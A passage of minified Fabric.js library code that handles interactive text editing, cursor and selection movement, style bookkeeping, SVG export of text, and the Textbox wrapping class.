this.canvas&&(this.canvas.calcOffset(),this.exitEditingOnOthers(this.canvas)),this.isEditing=!0,this.initHiddenTextarea(g),this.hiddenTextarea.focus(),this.hiddenTextarea.value=this.text,this._updateTextarea(),this._saveEditingProps(),this._setEditingProps(),this._textBeforeEdit=this.text,this._tick(),this.fire("editing:entered"),this._fireSelectionChanged(),this.canvas?(this.canvas.fire("text:editing:entered",{target:this}),this.initMouseMoveHandler(),this.canvas.requestRenderAll(),this):this},exitEditingOnOthers:function(g){g._iTextInstances&&g._iTextInstances.forEach(function(b){b.selected=!1,b.isEditing&&b.exitEditing()})},initMouseMoveHandler:function(){this.canvas.on("mouse:move",this.mouseMoveHandler)},mouseMoveHandler:function(g){if(this.__isMousedown&&this.isEditing){document.activeElement!==this.hiddenTextarea&&this.hiddenTextarea.focus();var b=this.getSelectionStartFromPointer(g.e),_=this.selectionStart,y=this.selectionEnd;(b!==this.__selectionStartOnMouseDown||_===y)&&(_===b||y===b)||(b>this.__selectionStartOnMouseDown?(this.selectionStart=this.__selectionStartOnMouseDown,this.selectionEnd=b):(this.selectionStart=b,this.selectionEnd=this.__selectionStartOnMouseDown),(this.selectionStart!==_||this.selectionEnd!==y)&&(this.restartCursorIfNeeded(),this._fireSelectionChanged(),this._updateTextarea(),this.renderCursorOrSelection()))}},_setEditingProps:function(){this.hoverCursor="text",this.canvas&&(this.canvas.defaultCursor=this.canvas.moveCursor="text"),this.borderColor=this.editingBorderColor,this.hasControls=this.selectable=!1,this.lockMovementX=this.lockMovementY=!0},fromStringToGraphemeSelection:function(g,b,_){var y=_.slice(0,g),M=j.util.string.graphemeSplit(y).length;if(g===b)return{selectionStart:M,selectionEnd:M};var p=_.slice(g,b);return{selectionStart:M,selectionEnd:M+j.util.string.graphemeSplit(p).length}},fromGraphemeToStringSelection:function(g,b,_){var M=_.slice(0,g).join("").length;return g===b?{selectionStart:M,selectionEnd:M}:{selectionStart:M,selectionEnd:M+_.slice(g,b).join("").length}},_updateTextarea:function(){if(this.cursorOffsetCache={},this.hiddenTextarea){if(!this.inCompositionMode){var g=this.fromGraphemeToStringSelection(this.selectionStart,this.selectionEnd,this._text);this.hiddenTextarea.selectionStart=g.selectionStart,this.hiddenTextarea.selectionEnd=g.selectionEnd}this.updateTextareaPosition()}},updateFromTextArea:function(){if(this.hiddenTextarea){this.cursorOffsetCache={},this.text=this.hiddenTextarea.value,this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords());var g=this.fromStringToGraphemeSelection(this.hiddenTextarea.selectionStart,this.hiddenTextarea.selectionEnd,this.hiddenTextarea.value);this.selectionEnd=this.selectionStart=g.selectionEnd,this.inCompositionMode||(this.selectionStart=g.selectionStart),this.updateTextareaPosition()}},updateTextareaPosition:function(){if(this.selectionStart===this.selectionEnd){var g=this._calcTextareaPosition();this.hiddenTextarea.style.left=g.left,this.hiddenTextarea.style.top=g.top}},_calcTextareaPosition:function(){if(!this.canvas)return{x:1,y:1};var g=this.inCompositionMode?this.compositionStart:this.selectionStart,b=this._getCursorBoundaries(g),_=this.get2DCursorLocation(g),p=this.getValueOfPropertyAt(_.lineIndex,_.charIndex,"fontSize")*this.lineHeight,D=b.leftOffset,w=this.calcTransformMatrix(),x={x:b.left+D,y:b.top+b.topOffset+p},S=this.canvas.getRetinaScaling(),O=this.canvas.upperCanvasEl,U=O.width/S,K=O.height/S,ee=U-p,se=K-p,ve=O.clientWidth/U,le=O.clientHeight/K;return x=j.util.transformPoint(x,w),(x=j.util.transformPoint(x,this.canvas.viewportTransform)).x*=ve,x.y*=le,x.x<0&&(x.x=0),x.x>ee&&(x.x=ee),x.y<0&&(x.y=0),x.y>se&&(x.y=se),x.x+=this.canvas._offset.left,x.y+=this.canvas._offset.top,{left:x.x+"px",top:x.y+"px",fontSize:p+"px",charHeight:p}},_saveEditingProps:function(){this._savedProps={hasControls:this.hasControls,borderColor:this.borderColor,lockMovementX:this.lockMovementX,lockMovementY:this.lockMovementY,hoverCursor:this.hoverCursor,selectable:this.selectable,defaultCursor:this.canvas&&this.canvas.defaultCursor,moveCursor:this.canvas&&this.canvas.moveCursor}},_restoreEditingProps:function(){!this._savedProps||(this.hoverCursor=this._savedProps.hoverCursor,this.hasControls=this._savedProps.hasControls,this.borderColor=this._savedProps.borderColor,this.selectable=this._savedProps.selectable,this.lockMovementX=this._savedProps.lockMovementX,this.lockMovementY=this._savedProps.lockMovementY,this.canvas&&(this.canvas.defaultCursor=this._savedProps.defaultCursor,this.canvas.moveCursor=this._savedProps.moveCursor))},exitEditing:function(){var g=this._textBeforeEdit!==this.text,b=this.hiddenTextarea;return this.selected=!1,this.isEditing=!1,this.selectionEnd=this.selectionStart,b&&(b.blur&&b.blur(),b.parentNode&&b.parentNode.removeChild(b)),this.hiddenTextarea=null,this.abortCursorAnimation(),this._restoreEditingProps(),this._currentCursorOpacity=0,this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords()),this.fire("editing:exited"),g&&this.fire("modified"),this.canvas&&(this.canvas.off("mouse:move",this.mouseMoveHandler),this.canvas.fire("text:editing:exited",{target:this}),g&&this.canvas.fire("object:modified",{target:this})),this},_removeExtraneousStyles:function(){for(var g in this.styles)this._textLines[g]||delete this.styles[g]},removeStyleFromTo:function(g,b){var x,S,_=this.get2DCursorLocation(g,!0),y=this.get2DCursorLocation(b,!0),M=_.lineIndex,p=_.charIndex,D=y.lineIndex,w=y.charIndex;if(M!==D){if(this.styles[M])for(x=p;x<this._unwrappedTextLines[M].length;x++)delete this.styles[M][x];if(this.styles[D])for(x=w;x<this._unwrappedTextLines[D].length;x++)(S=this.styles[D][x])&&(this.styles[M]||(this.styles[M]={}),this.styles[M][p+x-w]=S);for(x=M+1;x<=D;x++)delete this.styles[x];this.shiftLineStyles(D,M-D)}else if(this.styles[M]){S=this.styles[M];var U,K,O=w-p;for(x=p;x<w;x++)delete S[x];for(K in this.styles[M])(U=parseInt(K,10))>=w&&(S[U-O]=S[K],delete S[K])}},shiftLineStyles:function(g,b){var _=E(this.styles);for(var y in this.styles){var M=parseInt(y,10);M>g&&(this.styles[M+b]=_[M],_[M-b]||delete this.styles[M])}},restartCursorIfNeeded:function(){(!this._currentTickState||this._currentTickState.isAborted||!this._currentTickCompleteState||this._currentTickCompleteState.isAborted)&&this.initDelayedCursor()},insertNewlineStyleObject:function(g,b,_,y){var M,p={},D=!1,w=this._unwrappedTextLines[g].length===b;for(var x in _||(_=1),this.shiftLineStyles(g,_),this.styles[g]&&(M=this.styles[g][0===b?b:b-1]),this.styles[g]){var S=parseInt(x,10);S>=b&&(D=!0,p[S-b]=this.styles[g][x],w&&0===b||delete this.styles[g][x])}var O=!1;for(D&&!w&&(this.styles[g+_]=p,O=!0),O&&_--;_>0;)y&&y[_-1]?this.styles[g+_]={0:E(y[_-1])}:M?this.styles[g+_]={0:E(M)}:delete this.styles[g+_],_--;this._forceClearCache=!0},insertCharStyleObject:function(g,b,_,y){this.styles||(this.styles={});var M=this.styles[g],p=M?E(M):{};for(var D in _||(_=1),p){var w=parseInt(D,10);w>=b&&(M[w+_]=p[w],p[w-_]||delete M[w])}if(this._forceClearCache=!0,y)for(;_--;)!Object.keys(y[_]).length||(this.styles[g]||(this.styles[g]={}),this.styles[g][b+_]=E(y[_]));else if(M)for(var x=M[b?b-1:1];x&&_--;)this.styles[g][b+_]=E(x)},insertNewStyleBlock:function(g,b,_){for(var y=this.get2DCursorLocation(b,!0),M=[0],p=0,D=0;D<g.length;D++)"\n"===g[D]?M[++p]=0:M[p]++;for(M[0]>0&&(this.insertCharStyleObject(y.lineIndex,y.charIndex,M[0],_),_=_&&_.slice(M[0]+1)),p&&this.insertNewlineStyleObject(y.lineIndex,y.charIndex+M[0],p),D=1;D<p;D++)M[D]>0?this.insertCharStyleObject(y.lineIndex+D,0,M[D],_):_&&this.styles[y.lineIndex+D]&&_[0]&&(this.styles[y.lineIndex+D][0]=_[0]),_=_&&_.slice(M[D]+1);M[D]>0&&this.insertCharStyleObject(y.lineIndex+D,0,M[D],_)},setSelectionStartEndWithShift:function(g,b,_){_<=g?(b===g?this._selectionDirection="left":"right"===this._selectionDirection&&(this._selectionDirection="left",this.selectionEnd=g),this.selectionStart=_):_>g&&_<b?"right"===this._selectionDirection?this.selectionEnd=_:this.selectionStart=_:(b===g?this._selectionDirection="right":"left"===this._selectionDirection&&(this._selectionDirection="right",this.selectionStart=b),this.selectionEnd=_)},setSelectionInBoundaries:function(){var g=this.text.length;this.selectionStart>g?this.selectionStart=g:this.selectionStart<0&&(this.selectionStart=0),this.selectionEnd>g?this.selectionEnd=g:this.selectionEnd<0&&(this.selectionEnd=0)}})}(),j.util.object.extend(j.IText.prototype,{initDoubleClickSimulation:function(){this.__lastClickTime=+new Date,this.__lastLastClickTime=+new Date,this.__lastPointer={},this.on("mousedown",this.onMouseDown)},onMouseDown:function(E){if(this.canvas){this.__newClickTime=+new Date;var g=E.pointer;this.isTripleClick(g)&&(this.fire("tripleclick",E),this._stopEvent(E.e)),this.__lastLastClickTime=this.__lastClickTime,this.__lastClickTime=this.__newClickTime,this.__lastPointer=g,this.__lastIsEditing=this.isEditing,this.__lastSelected=this.selected}},isTripleClick:function(E){return this.__newClickTime-this.__lastClickTime<500&&this.__lastClickTime-this.__lastLastClickTime<500&&this.__lastPointer.x===E.x&&this.__lastPointer.y===E.y},_stopEvent:function(E){E.preventDefault&&E.preventDefault(),E.stopPropagation&&E.stopPropagation()},initCursorSelectionHandlers:function(){this.initMousedownHandler(),this.initMouseupHandler(),this.initClicks()},doubleClickHandler:function(E){!this.isEditing||this.selectWord(this.getSelectionStartFromPointer(E.e))},tripleClickHandler:function(E){!this.isEditing||this.selectLine(this.getSelectionStartFromPointer(E.e))},initClicks:function(){this.on("mousedblclick",this.doubleClickHandler),this.on("tripleclick",this.tripleClickHandler)},_mouseDownHandler:function(E){!this.canvas||!this.editable||E.e.button&&1!==E.e.button||(this.__isMousedown=!0,this.selected&&(this.inCompositionMode=!1,this.setCursorByClick(E.e)),this.isEditing&&(this.__selectionStartOnMouseDown=this.selectionStart,this.selectionStart===this.selectionEnd&&this.abortCursorAnimation(),this.renderCursorOrSelection()))},_mouseDownHandlerBefore:function(E){!this.canvas||!this.editable||E.e.button&&1!==E.e.button||(this.selected=this===this.canvas._activeObject)},initMousedownHandler:function(){this.on("mousedown",this._mouseDownHandler),this.on("mousedown:before",this._mouseDownHandlerBefore)},initMouseupHandler:function(){this.on("mouseup",this.mouseUpHandler)},mouseUpHandler:function(E){if(this.__isMousedown=!1,!(!this.editable||this.group||E.transform&&E.transform.actionPerformed||E.e.button&&1!==E.e.button)){if(this.canvas){var g=this.canvas._activeObject;if(g&&g!==this)return}this.__lastSelected&&!this.__corner?(this.selected=!1,this.__lastSelected=!1,this.enterEditing(E.e),this.selectionStart===this.selectionEnd?this.initDelayedCursor(!0):this.renderCursorOrSelection()):this.selected=!0}},setCursorByClick:function(E){var g=this.getSelectionStartFromPointer(E);E.shiftKey?this.setSelectionStartEndWithShift(this.selectionStart,this.selectionEnd,g):(this.selectionStart=g,this.selectionEnd=g),this.isEditing&&(this._fireSelectionChanged(),this._updateTextarea())},getSelectionStartFromPointer:function(E){for(var w,g=this.getLocalPointer(E),b=0,_=0,y=0,M=0,p=0,x=0,S=this._textLines.length;x<S&&y<=g.y;x++)y+=this.getHeightOfLine(x)*this.scaleY,p=x,x>0&&(M+=this._textLines[x-1].length+this.missingNewlineOffset(x-1));_=this._getLineLeftOffset(p)*this.scaleX,w=this._textLines[p],"rtl"===this.direction&&(g.x=this.width*this.scaleX-g.x+_);for(var O=0,U=w.length;O<U&&(b=_,(_+=this.__charBounds[p][O].kernedWidth*this.scaleX)<=g.x);O++)M++;return this._getNewSelectionStartFromOffset(g,b,_,M,U)},_getNewSelectionStartFromOffset:function(E,g,b,_,y){var p=b-E.x,w=_+(p>E.x-g||p<0?0:1);return this.flipX&&(w=y-w),w>this._text.length&&(w=this._text.length),w}}),j.util.object.extend(j.IText.prototype,{initHiddenTextarea:function(){this.hiddenTextarea=j.document.createElement("textarea"),this.hiddenTextarea.setAttribute("autocapitalize","off"),this.hiddenTextarea.setAttribute("autocorrect","off"),this.hiddenTextarea.setAttribute("autocomplete","off"),this.hiddenTextarea.setAttribute("spellcheck","false"),this.hiddenTextarea.setAttribute("data-fabric-hiddentextarea",""),this.hiddenTextarea.setAttribute("wrap","off");var E=this._calcTextareaPosition();this.hiddenTextarea.style.cssText="position: absolute; top: "+E.top+"; left: "+E.left+"; z-index: -999; opacity: 0; width: 1px; height: 1px; font-size: 1px; padding\uff70top: "+E.fontSize+";",this.hiddenTextareaContainer?this.hiddenTextareaContainer.appendChild(this.hiddenTextarea):j.document.body.appendChild(this.hiddenTextarea),j.util.addListener(this.hiddenTextarea,"keydown",this.onKeyDown.bind(this)),j.util.addListener(this.hiddenTextarea,"keyup",this.onKeyUp.bind(this)),j.util.addListener(this.hiddenTextarea,"input",this.onInput.bind(this)),j.util.addListener(this.hiddenTextarea,"copy",this.copy.bind(this)),j.util.addListener(this.hiddenTextarea,"cut",this.copy.bind(this)),j.util.addListener(this.hiddenTextarea,"paste",this.paste.bind(this)),j.util.addListener(this.hiddenTextarea,"compositionstart",this.onCompositionStart.bind(this)),j.util.addListener(this.hiddenTextarea,"compositionupdate",this.onCompositionUpdate.bind(this)),j.util.addListener(this.hiddenTextarea,"compositionend",this.onCompositionEnd.bind(this)),!this._clickHandlerInitialized&&this.canvas&&(j.util.addListener(this.canvas.upperCanvasEl,"click",this.onClick.bind(this)),this._clickHandlerInitialized=!0)},keysMap:{9:"exitEditing",27:"exitEditing",33:"moveCursorUp",34:"moveCursorDown",35:"moveCursorRight",36:"moveCursorLeft",37:"moveCursorLeft",38:"moveCursorUp",39:"moveCursorRight",40:"moveCursorDown"},keysMapRtl:{9:"exitEditing",27:"exitEditing",33:"moveCursorUp",34:"moveCursorDown",35:"moveCursorLeft",36:"moveCursorRight",37:"moveCursorRight",38:"moveCursorUp",39:"moveCursorLeft",40:"moveCursorDown"},ctrlKeysMapUp:{67:"copy",88:"cut"},ctrlKeysMapDown:{65:"selectAll"},onClick:function(){this.hiddenTextarea&&this.hiddenTextarea.focus()},onKeyDown:function(E){if(this.isEditing){var g="rtl"===this.direction?this.keysMapRtl:this.keysMap;if(E.keyCode in g)this[g[E.keyCode]](E);else{if(!(E.keyCode in this.ctrlKeysMapDown)||!E.ctrlKey&&!E.metaKey)return;this[this.ctrlKeysMapDown[E.keyCode]](E)}E.stopImmediatePropagation(),E.preventDefault(),E.keyCode>=33&&E.keyCode<=40?(this.inCompositionMode=!1,this.clearContextTop(),this.renderCursorOrSelection()):this.canvas&&this.canvas.requestRenderAll()}},onKeyUp:function(E){!this.isEditing||this._copyDone||this.inCompositionMode?this._copyDone=!1:E.keyCode in this.ctrlKeysMapUp&&(E.ctrlKey||E.metaKey)&&(this[this.ctrlKeysMapUp[E.keyCode]](E),E.stopImmediatePropagation(),E.preventDefault(),this.canvas&&this.canvas.requestRenderAll())},onInput:function(E){var g=this.fromPaste;if(this.fromPaste=!1,E&&E.stopPropagation(),this.isEditing){var M,p,O,U,K,b=this._splitTextIntoLines(this.hiddenTextarea.value).graphemeText,_=this._text.length,y=b.length,D=y-_,w=this.selectionStart,x=this.selectionEnd,S=w!==x;if(""===this.hiddenTextarea.value)return this.styles={},this.updateFromTextArea(),this.fire("changed"),void(this.canvas&&(this.canvas.fire("text:changed",{target:this}),this.canvas.requestRenderAll()));var ee=this.fromStringToGraphemeSelection(this.hiddenTextarea.selectionStart,this.hiddenTextarea.selectionEnd,this.hiddenTextarea.value),se=w>ee.selectionStart;S?(M=this._text.slice(w,x),D+=x-w):y<_&&(M=se?this._text.slice(x+D,x):this._text.slice(w,w-D)),p=b.slice(ee.selectionEnd-D,ee.selectionEnd),M&&M.length&&(p.length&&(O=this.getSelectionStyles(w,w+1,!1),O=p.map(function(){return O[0]})),S?(U=w,K=x):se?(U=x-M.length,K=x):(U=x,K=x+M.length),this.removeStyleFromTo(U,K)),p.length&&(g&&p.join("")===j.copiedText&&!j.disableStyleCopyPaste&&(O=j.copiedTextStyle),this.insertNewStyleBlock(p,w,O)),this.updateFromTextArea(),this.fire("changed"),this.canvas&&(this.canvas.fire("text:changed",{target:this}),this.canvas.requestRenderAll())}},onCompositionStart:function(){this.inCompositionMode=!0},onCompositionEnd:function(){this.inCompositionMode=!1},onCompositionUpdate:function(E){this.compositionStart=E.target.selectionStart,this.compositionEnd=E.target.selectionEnd,this.updateTextareaPosition()},copy:function(){this.selectionStart!==this.selectionEnd&&(j.copiedText=this.getSelectedText(),j.copiedTextStyle=j.disableStyleCopyPaste?null:this.getSelectionStyles(this.selectionStart,this.selectionEnd,!0),this._copyDone=!0)},paste:function(){this.fromPaste=!0},_getClipboardData:function(E){return E&&E.clipboardData||j.window.clipboardData},_getWidthBeforeCursor:function(E,g){var _,b=this._getLineLeftOffset(E);return g>0&&(b+=(_=this.__charBounds[E][g-1]).left+_.width),b},getDownCursorOffset:function(E,g){var b=this._getSelectionForOffset(E,g),_=this.get2DCursorLocation(b),y=_.lineIndex;if(y===this._textLines.length-1||E.metaKey||34===E.keyCode)return this._text.length-b;var M=_.charIndex,p=this._getWidthBeforeCursor(y,M),D=this._getIndexOnLine(y+1,p);return this._textLines[y].slice(M).length+D+1+this.missingNewlineOffset(y)},_getSelectionForOffset:function(E,g){return E.shiftKey&&this.selectionStart!==this.selectionEnd&&g?this.selectionEnd:this.selectionStart},getUpCursorOffset:function(E,g){var b=this._getSelectionForOffset(E,g),_=this.get2DCursorLocation(b),y=_.lineIndex;if(0===y||E.metaKey||33===E.keyCode)return-b;var M=_.charIndex,p=this._getWidthBeforeCursor(y,M),D=this._getIndexOnLine(y-1,p),w=this._textLines[y].slice(0,M),x=this.missingNewlineOffset(y-1);return-this._textLines[y-1].length+D-w.length+(1-x)},_getIndexOnLine:function(E,g){for(var p,D,b=this._textLines[E],y=this._getLineLeftOffset(E),M=0,w=0,x=b.length;w<x;w++)if((y+=p=this.__charBounds[E][w].width)>g){D=!0;var O=y,U=Math.abs(y-p-g);M=Math.abs(O-g)<U?w:w-1;break}return D||(M=b.length-1),M},moveCursorDown:function(E){this.selectionStart>=this._text.length&&this.selectionEnd>=this._text.length||this._moveCursorUpOrDown("Down",E)},moveCursorUp:function(E){0===this.selectionStart&&0===this.selectionEnd||this._moveCursorUpOrDown("Up",E)},_moveCursorUpOrDown:function(E,g){var _=this["get"+E+"CursorOffset"](g,"right"===this._selectionDirection);g.shiftKey?this.moveCursorWithShift(_):this.moveCursorWithoutShift(_),0!==_&&(this.setSelectionInBoundaries(),this.abortCursorAnimation(),this._currentCursorOpacity=1,this.initDelayedCursor(),this._fireSelectionChanged(),this._updateTextarea())},moveCursorWithShift:function(E){return this.setSelectionStartEndWithShift(this.selectionStart,this.selectionEnd,"left"===this._selectionDirection?this.selectionStart+E:this.selectionEnd+E),0!==E},moveCursorWithoutShift:function(E){return E<0?(this.selectionStart+=E,this.selectionEnd=this.selectionStart):(this.selectionEnd+=E,this.selectionStart=this.selectionEnd),0!==E},moveCursorLeft:function(E){0===this.selectionStart&&0===this.selectionEnd||this._moveCursorLeftOrRight("Left",E)},_move:function(E,g,b){var _;if(E.altKey)_=this["findWordBoundary"+b](this[g]);else{if(!E.metaKey&&35!==E.keyCode&&36!==E.keyCode)return this[g]+="Left"===b?-1:1,!0;_=this["findLineBoundary"+b](this[g])}if(void 0!==_&&this[g]!==_)return this[g]=_,!0},_moveLeft:function(E,g){return this._move(E,g,"Left")},_moveRight:function(E,g){return this._move(E,g,"Right")},moveCursorLeftWithoutShift:function(E){var g=!0;return this._selectionDirection="left",this.selectionEnd===this.selectionStart&&0!==this.selectionStart&&(g=this._moveLeft(E,"selectionStart")),this.selectionEnd=this.selectionStart,g},moveCursorLeftWithShift:function(E){return"right"===this._selectionDirection&&this.selectionStart!==this.selectionEnd?this._moveLeft(E,"selectionEnd"):0!==this.selectionStart?(this._selectionDirection="left",this._moveLeft(E,"selectionStart")):void 0},moveCursorRight:function(E){this.selectionStart>=this._text.length&&this.selectionEnd>=this._text.length||this._moveCursorLeftOrRight("Right",E)},_moveCursorLeftOrRight:function(E,g){var b="moveCursor"+E+"With";this._currentCursorOpacity=1,this[b+=g.shiftKey?"Shift":"outShift"](g)&&(this.abortCursorAnimation(),this.initDelayedCursor(),this._fireSelectionChanged(),this._updateTextarea())},moveCursorRightWithShift:function(E){return"left"===this._selectionDirection&&this.selectionStart!==this.selectionEnd?this._moveRight(E,"selectionStart"):this.selectionEnd!==this._text.length?(this._selectionDirection="right",this._moveRight(E,"selectionEnd")):void 0},moveCursorRightWithoutShift:function(E){var g=!0;return this._selectionDirection="right",this.selectionStart===this.selectionEnd?(g=this._moveRight(E,"selectionStart"),this.selectionEnd=this.selectionStart):this.selectionStart=this.selectionEnd,g},removeChars:function(E,g){void 0===g&&(g=E+1),this.removeStyleFromTo(E,g),this._text.splice(E,g-E),this.text=this._text.join(""),this.set("dirty",!0),this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords()),this._removeExtraneousStyles()},insertChars:function(E,g,b,_){void 0===_&&(_=b),_>b&&this.removeStyleFromTo(b,_);var y=j.util.string.graphemeSplit(E);this.insertNewStyleBlock(y,b,g),this._text=[].concat(this._text.slice(0,b),y,this._text.slice(_)),this.text=this._text.join(""),this.set("dirty",!0),this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords()),this._removeExtraneousStyles()}}),function(){var E=j.util.toFixed,g=/  +/g;j.util.object.extend(j.Text.prototype,{_toSVG:function(){var b=this._getSVGLeftTopOffsets(),_=this._getSVGTextAndBg(b.textTop,b.textLeft);return this._wrapSVGTextAndBg(_)},toSVG:function(b){return this._createBaseSVGMarkup(this._toSVG(),{reviver:b,noStyle:!0,withShadow:!0})},_getSVGLeftTopOffsets:function(){return{textLeft:-this.width/2,textTop:-this.height/2,lineTop:this.getHeightOfLine(0)}},_wrapSVGTextAndBg:function(b){var y=this.getSvgTextDecoration(this);return[b.textBgRects.join(""),'\t\t<text xml:space="preserve" ',this.fontFamily?'font-family="'+this.fontFamily.replace(/"/g,"'")+'" ':"",this.fontSize?'font-size="'+this.fontSize+'" ':"",this.fontStyle?'font-style="'+this.fontStyle+'" ':"",this.fontWeight?'font-weight="'+this.fontWeight+'" ':"",y?'text-decoration="'+y+'" ':"",'style="',this.getSvgStyles(!0),'"',this.addPaintOrder()," >",b.textSpans.join(""),"</text>\n"]},_getSVGTextAndBg:function(b,_){var D,y=[],M=[],p=b;this._setSVGBg(M);for(var w=0,x=this._textLines.length;w<x;w++)D=this._getLineLeftOffset(w),(this.textBackgroundColor||this.styleHas("textBackgroundColor",w))&&this._setSVGTextLineBg(M,w,_+D,p),this._setSVGTextLineText(y,w,_+D,p),p+=this.getHeightOfLine(w);return{textSpans:y,textBgRects:M}},_createTextCharSpan:function(b,_,y,M){var p=b!==b.trim()||b.match(g),D=this.getSvgSpanStyles(_,p),w=D?'style="'+D+'"':"",x=_.deltaY,S="",O=j.Object.NUM_FRACTION_DIGITS;return x&&(S=' dy="'+E(x,O)+'" '),['<tspan x="',E(y,O),'" y="',E(M,O),'" ',S,w,">",j.util.string.escapeXml(b),"</tspan>"].join("")},_setSVGTextLineText:function(b,_,y,M){var w,x,O,U,se,p=this.getHeightOfLine(_),D=-1!==this.textAlign.indexOf("justify"),S="",K=0,ee=this._textLines[_];M+=p*(1-this._fontSizeFraction)/this.lineHeight;for(var ve=0,le=ee.length-1;ve<=le;ve++)se=ve===le||this.charSpacing,S+=ee[ve],O=this.__charBounds[_][ve],0===K?(y+=O.kernedWidth-O.width,K+=O.width):K+=O.kernedWidth,D&&!se&&this._reSpaceAndTab.test(ee[ve])&&(se=!0),se||(w=w||this.getCompleteStyleDeclaration(_,ve),x=this.getCompleteStyleDeclaration(_,ve+1),se=j.util.hasStyleChanged(w,x,!0)),se&&(U=this._getStyleDeclaration(_,ve)||{},b.push(this._createTextCharSpan(S,U,y,M)),S="",w=x,y+=K,K=0)},_pushTextBgRect:function(b,_,y,M,p,D){var w=j.Object.NUM_FRACTION_DIGITS;b.push("\t\t<rect ",this._getFillAttributes(_),' x="',E(y,w),'" y="',E(M,w),'" width="',E(p,w),'" height="',E(D,w),'"></rect>\n')},_setSVGTextLineBg:function(b,_,y,M){for(var S,O,p=this._textLines[_],D=this.getHeightOfLine(_)/this.lineHeight,w=0,x=0,U=this.getValueOfPropertyAt(_,0,"textBackgroundColor"),K=0,ee=p.length;K<ee;K++)S=this.__charBounds[_][K],(O=this.getValueOfPropertyAt(_,K,"textBackgroundColor"))!==U?(U&&this._pushTextBgRect(b,U,y+x,M,w,D),x=S.left,w=S.width,U=O):w+=S.kernedWidth;O&&this._pushTextBgRect(b,O,y+x,M,w,D)},_getFillAttributes:function(b){var _=b&&"string"==typeof b?new j.Color(b):"";return _&&_.getSource()&&1!==_.getAlpha()?'opacity="'+_.getAlpha()+'" fill="'+_.setAlpha(1).toRgb()+'"':'fill="'+b+'"'},_getSVGLineTopOffset:function(b){for(var y,_=0,M=0;M<b;M++)_+=this.getHeightOfLine(M);return y=this.getHeightOfLine(M),{lineTop:_,offset:(this._fontSizeMult-this._fontSizeFraction)*y/(this.lineHeight*this._fontSizeMult)}},getSvgStyles:function(b){return j.Object.prototype.getSvgStyles.call(this,b)+" white-space: pre;"}})}(),function(E){"use strict";var g=E.fabric||(E.fabric={});g.Textbox=g.util.createClass(g.IText,g.Observable,{type:"textbox",minWidth:20,dynamicMinWidth:2,__cachedLines:null,lockScalingFlip:!0,noScaleCache:!1,_dimensionAffectingProps:g.Text.prototype._dimensionAffectingProps.concat("width"),_wordJoiners:/[ \t\r]/,splitByGrapheme:!1,initDimensions:function(){this.__skipDimension||(this.isEditing&&this.initDelayedCursor(),this.clearContextTop(),this._clearCache(),this.dynamicMinWidth=0,this._styleMap=this._generateStyleMap(this._splitText()),this.dynamicMinWidth>this.width&&this._set("width",this.dynamicMinWidth),-1!==this.textAlign.indexOf("justify")&&this.enlargeSpaces(),this.height=this.calcTextHeight(),this.saveState({propertySet:"_dimensionAffectingProps"}))},_generateStyleMap:function(b){for(var _=0,y=0,M=0,p={},D=0;D<b.graphemeLines.length;D++)"\n"===b.graphemeText[M]&&D>0?(y=0,M++,_++):!this.splitByGrapheme&&this._reSpaceAndTab.test(b.graphemeText[M])&&D>0&&(y++,M++),p[D]={line:_,offset:y},M+=b.graphemeLines[D].length,y+=b.graphemeLines[D].length;return p},styleHas:function(b,_){if(this._styleMap&&!this.isWrapping){var y=this._styleMap[_];y&&(_=y.line)}return g.Text.prototype.styleHas.call(this,b,_)},isEmptyStyles:function(b){if(!this.styles)return!0;var M,p,_=0,D=!1,w=this._styleMap[b],x=this._styleMap[b+1];for(var S in w&&(b=w.line,_=w.offset),x&&(D=x.line===b,M=x.offset),p=void 0===b?this.styles:{line:this.styles[b]})for(var O in p[S])if(O>=_&&(!D||O<M))for(var U in p[S][O])return!1;return!0},_getStyleDeclaration:function(b,_){if(this._styleMap&&!this.isWrapping){var y=this._styleMap[b];if(!y)return null;b=y.line,_=y.offset+_}return this.callSuper("_getStyleDeclaration",b,_)},_setStyleDeclaration:function(b,_,y){var M=this._styleMap[b];this.styles[b=M.line][_=M.offset+_]=y},_deleteStyleDeclaration:function(b,_){var y=this._styleMap[b];delete this.styles[b=y.line][_=y.offset+_]},_getLineStyle:function(b){return!!this.styles[this._styleMap[b].line]},_setLineStyle:function(b){this.styles[this._styleMap[b].line]={}},_wrapText:function(b,_){var M,y=[];for(this.isWrapping=!0,M=0;M<b.length;M++)y=y.concat(this._wrapLine(b[M],M,_));return this.isWrapping=!1,y},_measureWord:function(b,_,y){var p,M=0;y=y||0;for(var w=0,x=b.length;w<x;w++)M+=this._getGraphemeBox(b[w],_,w+y,p,!0).kernedWidth,p=b[w];return M},_wrapLine:function(b,_,y,z){var p=0,D=this.splitByGrapheme,w=[],x=[],S=D?g.util.string.graphemeSplit(b):b.split(this._wordJoiners),O="",U=0,K=D?"":" ",ee=0,se=0,ve=0,le=!0,ye=this._getWidthOfCharSpacing();z=z||0,0===S.length&&S.push([]),y-=z;for(var l=0;l<S.length;l++)O=D?S[l]:g.util.string.graphemeSplit(S[l]),ee=this._measureWord(O,_,U),U+=O.length,(p+=se+ee-ye)>y&&!le?(w.push(x),x=[],p=ee,le=!0):p+=ye,!le&&!D&&x.push(K),x=x.concat(O),se=D?0:this._measureWord([K],_,U),U++,le=!1,ee>ve&&(ve=ee);return l&&w.push(x),ve+z>this.dynamicMinWidth&&(this.dynamicMinWidth=ve-ye+z),w},isEndOfWrapping:function(b){return!this._styleMap[b+1]||this._styleMap[b+1].line!==this._styleMap[b].line},missingNewlineOffset:function(b){return this.splitByGrapheme?this.isEndOfWrapping(b)?1:0:1},_splitTextIntoLines:function(b){for(var _=g.Text.prototype._splitTextIntoLines.call(this,b),y=this._wrapText(_.lines,this.width),M=new Array(y.length),p=0;p<y.length;p++)M[p]=y[p].join("");return _.lines=M,_.graphemeLines=y,_},getMinWidth:function(){return Math.max(this.minWidth,this.dynamicMinWidth)},_removeExtraneousStyles:function(){var b={};for(var _ in this._styleMap)this._textLines[_]&&(b[this._styleMap[_].line]=1);for(var _ in this.styles)b[_]||delete this.styles[_]},toObject:function(b){return this.callSuper("toObject",["minWidth","splitByGrapheme"].concat(b))}}),g.Textbox.fromObject=function(b,_){var y=g.util.stylesFromArray(b.styles,b.text),M=Object.assign({},b,{styles:y});return g.Object._fromObject("Textbox",M,_,"text")}}(we),function(){var 